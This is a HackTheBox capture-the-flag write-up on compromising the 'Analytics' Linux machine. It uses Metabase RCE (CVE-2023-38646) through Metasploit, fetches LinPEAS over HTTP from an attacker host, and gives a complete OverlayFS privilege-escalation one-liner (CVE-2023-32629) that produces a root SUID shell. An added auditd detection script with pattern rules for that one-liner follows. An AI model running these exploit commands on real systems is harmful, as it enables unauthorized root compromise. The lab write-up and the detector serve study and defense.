HTB Analytics. Escalating privileges with CVE-2023-32629

Greetings, kulhatzkers. Today’s write-up is dedicated to hacking the Linux machine from HackTheBox called Analytics.

Disclaimer: all utilities and techniques demonstrated in the article are provided for educational purposes.

Scanning and reconnaissance

As always, we start with scanning to identify active services.

nmap -sC -sV -Pn -p- -T4 10.10.11.234

Getting primary access using Metasploit

Based on the scan results, you can see that a web service is listening on port 80. Let’s open the web page:

This is Metabase. A quick search on the Internet turns up an exploit for it. The vulnerability has the ID CVE-2023-38646 and leads to remote code execution, which is just what we need to get initial access. The exploit can be found on GitHub and in Metasploit. Personally, I’ll run the exploit in Metasploit:

use exploit/linux/http/metabase_setup_token_rce

To advance further, we need to transfer LinPEAS to the machine to discover ways to escalate privileges. To do that, we will start python3 http.server on our own OS and download the script we need with wget:

python3 -m http.server 80
wget http://10.10.16.68/linpeas.sh

Let’s launch LinPEAS:

bash ./linpeas.sh

When it finishes, the script will have found the credentials for connecting via SSH:

Let’s connect to the machine using ssh:

ssh metalytics@10.10.11.233

The flag is located in user.txt

Privilege escalation

In the same way as before, let’s start python3 http.server, transfer LinPEAS over with wget and run it on the machine:

Once the script has finished, we can determine the version of Ubuntu and find a privilege escalation vulnerability for it. Alternatively, you can determine the OS version using cat /etc/os-release. The privilege escalation vulnerability is caused by discrepancies in the implementation of the OverlayFS module in the Linux kernel. OverlayFS is a union mount file system implementation that has been targeted by attackers because unprivileged users can reach it through user namespaces and because it has contained easily exploitable bugs. Let’s copy the payload from the exploit and run it to escalate privileges:

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'

The machine is solved!
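
From the defender's side, the one-liner above leaves a recognizable trace when auditd logs execve calls. The following is an added example, not part of the original write-up or of the exploit: it decodes auditd EXECVE records and flags a command line that combines unshare with root mapping, setcap cap_setuid and an overlay mount. It assumes an audit rule for execve is in place; make_record and the sample records are constructed for illustration.

```python
import re

# All three indicators come from the one-liner in this write-up; an alert needs every one.
INDICATORS = {
    "userns_unshare": re.compile(r"\bunshare\s+(?:-\S+\s+)*?(?:--map-root-user\b|-[A-Za-z]*r)"),
    "setcap_setuid": re.compile(r"\bsetcap\s+\S*cap_setuid"),
    "overlay_mount": re.compile(r"\bmount\s+(?:\S+\s+)*?-t\s+overlay\b"),
}
# auditd quotes plain arguments (a0="unshare") but hex-encodes arguments such as
# those containing spaces or double quotes, so a plain grep for "setcap" misses them.
ARG = re.compile(r'\ba(\d+)=(?:"([^"]*)"|((?:[0-9A-Fa-f]{2})+))')

def decode_execve(record):
    """Rebuild the command line from one auditd EXECVE record."""
    args = {}
    for idx, quoted, hexed in ARG.findall(record):
        args[int(idx)] = bytes.fromhex(hexed).decode("utf-8", "replace") if hexed else quoted
    return " ".join(args[i] for i in sorted(args))

def detect(records):
    """Return (audit event id, decoded command line) for records matching every indicator."""
    hits = []
    for rec in records:
        cmd = decode_execve(rec) if "type=EXECVE" in rec else ""
        if cmd and all(p.search(cmd) for p in INDICATORS.values()):
            event = re.search(r"audit\(([\d.]+:\d+)\)", rec)
            hits.append((event.group(1) if event else "?", cmd))
    return hits

def make_record(event_id, argv):
    """Constructed helper: format argv the way auditd lays out an EXECVE record."""
    def enc(arg):
        return arg.encode().hex().upper() if re.search(r'[\s"]', arg) else f'"{arg}"'
    fields = " ".join(f"a{i}={enc(a)}" for i, a in enumerate(argv))
    return f"type=EXECVE msg=audit({event_id}): argc={len(argv)} {fields}"

# Constructed sample records, not captured from the lab machine.
SAMPLE = [
    make_record("1700000000.100:41", ["unshare", "-rm", "sh", "-c",
        "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;"
        "mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;"]),
    make_record("1700000000.200:42", ["mount", "-t", "overlay", "overlay", "-o",
        "lowerdir=/a,upperdir=/b,workdir=/c", "/mnt"]),  # ordinary overlay mount
    make_record("1700000000.300:43", ["unshare", "-m", "sh", "-c", "ls -r /tmp"]),
]

if __name__ == "__main__":
    for event_id, cmd in detect(SAMPLE):
        print(f"ALERT {event_id}: {cmd}")
```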
